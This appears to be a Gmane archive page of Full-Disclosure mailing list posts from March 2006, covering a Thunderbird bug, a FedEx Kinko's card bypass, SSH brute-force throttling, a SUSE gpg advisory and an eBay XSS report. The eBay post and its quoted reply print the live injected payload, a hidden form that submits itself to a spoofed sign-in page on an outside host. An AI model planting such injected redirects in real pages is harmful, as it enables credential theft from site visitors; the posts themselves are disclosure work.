Daniel Veditz | 1 Mar 03:35 2006
Picon

Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

Daniel Veditz wrote:
> Renaud Lifchitz wrote:
>> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
> 
> We believe this to be a testing error.

I responded too soon. This is indeed a problem in the current release
version of Thunderbird 1.5
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Aaron Horst | 1 Mar 03:48 2006
Picon

Ebay XSS

The linked auction demonstrates an XSS flaw within ebay:

http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

The affected code is below the line "On Feb-28-06 at 16:31:39 PST,
seller added the following information:"

<form name="xxx"
action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html">
</form>
<script>
xxx.submit();
</script>

The redirection page seems to be simple spoofing, and emails the data
to cont_26_32 <at> yahoo.com.

AnthraX101

--
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

nodialtone | 1 Mar 03:56 2006
Picon
Picon

Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

On Tue, 2006-02-28 at 21:35, Daniel Veditz wrote:
> Daniel Veditz wrote:
> > Renaud Lifchitz wrote:
> >> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
> > 
> > We believe this to be a testing error.
> 
> I responded too soon. This is indeed a problem in the current release
> version of Thunderbird 1.5
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

I think mozilla has released a fix for this.  Or is this something new?

--

-- 
Unique Security Forums at:
http://www.iatechconsulting.com
Public key: http://www.iatechconsulting.com/dl/nodialtone.asc

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Lance James | 1 Mar 03:06 2006
Picon

Re: Fedex Kinkos Smart Card Authentication Bypass

Eric B wrote:
> Wait, so if I read this right, consumers with existing cards could
> dupe their legit cards for fake ones and cash in the fake ones yet
> still have credit on the legit card?
>
> So I'm assuming Fedex has no database/authentication system storing
> these serials...brilliant.
>

Yup.

According to Fedex Kinko's:
"Our analysis shows that the information in the article is inaccurate
and not based on the way the actual technology and security function.
Security is a priority to FedEx Kinko's, and we are confident in the
security of our network in preventing such illegal activity."

Our response:

http://ip.securescience.net/exploits/P1010029.JPG

> Good write-up, thanks!
>
> On 2/28/06, *Lance James* <bugtraq <at> securescience.net
> <mailto:bugtraq <at> securescience.net>> wrote:
>
>     Abstract:
>     ---------
>     The ExpressPay stored-value card system used by FedEx Kinko's is
>     vulnerable to attack.  An attacker who gains the ability to alter the
(Continue reading)

Gary Leons | 1 Mar 08:55 2006

Re: reduction of brute force login attempts via SSHthrough iptables --hashlimit

On 2/28/06, Josh Berry <josh.berry <at> netschematics.com> wrote:
>
> I guess it makes you feel bigger and better to be an  <at> sshole on a public
> mailing list but I don't think that anyone is impressed with the fact that
> you aren't offering any better ideas; just name-calling and showing a low
> maturity level.
>

I'm not trying to impress you, i'm trying to make sure anyone who uses
this script is aware of the security implications of doing so, this
list is called FULL-DISCLOSURE, which is exactly what i'm doing.

>
> I could be wrong, but doesn't last/lastb show users have have logged
> in/out.  Therefore it wouldn't necessarily catch brute-forcers (unless
> they were actually successful)?

Yes you could be wrong, how long would it have taken to type man lastb
and check? it lists failed login attempts, which is exactly what you
want.

> This guy was just trying to be helpful and demonstrate a way of blocking
> (or attempting to block) brute-forcers.  You aren't providing any value,
> just being a d!ck.

Are you on the correct mailing list? this list is for the disclosure
of security vulnerabilities, I think adding arbitrary firewall rules
to someone elses machine is a security issue worthy of disclosure by
anyone's standards.
_______________________________________________
(Continue reading)

ad@heapoverflow.com | 1 Mar 09:51 2006

Re: Ebay XSS


Aaron Horst wrote:
> The linked auction demonstrates an XSS flaw within ebay:
>
> http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem
>
> The affected code is below the line "On Feb-28-06 at 16:31:39 PST,
> seller added the following information:"
>
> <form name="xxx"
> action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html">
> </form>
> <script>
> xxx.submit();
> </script>
>
> The redirection page seems to be simple spoofing, and emails the data
> to cont_26_32 <at> yahoo.com.
>
> AnthraX101
>
> --
> AnthraX101 -- PGP Key ID# 0x4CD6D0BD
> Fingerprint:
> 8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
(Continue reading)

Marcus Meissner | 1 Mar 10:24 2006
Picon

SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:013)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                gpg,liby2util
        Announcement ID:        SUSE-SA:2006:013
        Date:                   Wed, 01 Mar 2006 11:00:00 +0000
        Affected Products:      SUSE LINUX 10.0
                                SUSE LINUX 9.3
                                SUSE LINUX 9.2
                                SUSE LINUX 9.1
                                SuSE Linux Desktop 1.0
                                SuSE Linux Enterprise Server 8
                                SUSE LINUX Enterprise Server 9
                                UnitedLinux 1.0
				Open Enterprise Server 1
				Novell Linux Desktop 9
        Vulnerability Type:     remote code execution
        Severity (1-10):        9
        SUSE Default Package:   yes
        Cross-References:       CVE-2006-0455, CVE-2006-0803

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             gpg signature checking problems
           Problem Description
(Continue reading)

Mayank | 1 Mar 11:57 2006
Picon

programming Aeronet card for authentication and configuration in embedded XP

I need to programmatically interact with Cisco aeronet
wireless card on Embedded XP, also I need to enable
EAP-TLS  and PEAP authentication with the AP. The user
interface is not at all available and I need to do it
all by APIs. Does CryptoAPI fully supported and
implemented in embedded XP? 
I heard there is something like Cisco API, please let
me know link for the sameĀ…

Cheers,
Mayank

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Dude VanWinkle | 1 Mar 14:01 2006
Picon

Re: Re: Fedex Kinkos Smart Card Authentication Bypass

On 2/28/06, Lance James <bugtraq <at> securescience.net> wrote:
> Eric B wrote:
> > Wait, so if I read this right, consumers with existing cards could
> > dupe their legit cards for fake ones and cash in the fake ones yet
> > still have credit on the legit card?
> >
> > So I'm assuming Fedex has no database/authentication system storing
> > these serials...brilliant.
> >
>
> Yup.
>
> According to Fedex Kinko's:
> "Our analysis shows that the information in the article is inaccurate
> and not based on the way the actual technology and security function.
> Security is a priority to FedEx Kinko's, and we are confident in the
> security of our network in preventing such illegal activity."
>
> Our response:
>
> http://ip.securescience.net/exploits/P1010029.JPG

lol, now thats a funny picture!

So am I to assume that normally you can go beyond 31337 on a Kinko's
card and this is a modding of the original to produce the displayed
picture?

-JP
_______________________________________________
(Continue reading)

Jay Libove | 1 Mar 14:14 2006

reduction of brute force login attempts via SSH through iptables --hashlimit

Well, as expected, this, like most postings here, generated much heat and 
actually a little light :)  Particular thanks to those who went to the 
effort to write scripts to read log files and make a more permanent 
reaction than iptables --hashlimit provides, and to further take the 
expected heat for posting anything here. I'm actually impressed that 
nobody took me to task for something stupid I did in my iptables 
--hashlimit command line. I can't have got it completely right, can I? 
What, not even one "you're a loser" for me? Heh.

The conversation about scripts which read log files and the holes in those 
scripts and the holes in those holes and the *ssholes and... are certainly 
interesting.

I would like to point out that - good old defense in depth - it probably 
is best to use some combination of these things.  Putting together 
iptables --hashlimit with some kind of log file reader will slow down the 
initial attack in real time, and allow a more leisurely (and less system 
intensive) log file scanner to react in not-so-real-time with more 
complete blockages against detected significant attackers.

Based on what I am now seeing in my log files every night after adding the 
hashlimit to my iptables rules, I don't feel a need to add any follow-up 
stronger blocking scripts.  The total number of brute force login attempts 
to my system is now so low that the expected occurrence of a password 
actually being guessed is in the noise just above zero.

Calculation: None of the accounts on my system use dictionary words. They 
aren't based on knowable information about me. And knowable information is 
not what these brute force attacks through SSH are going after anyway - 
they're going after known passwords from weakly configured applications or 
(Continue reading)


Gmane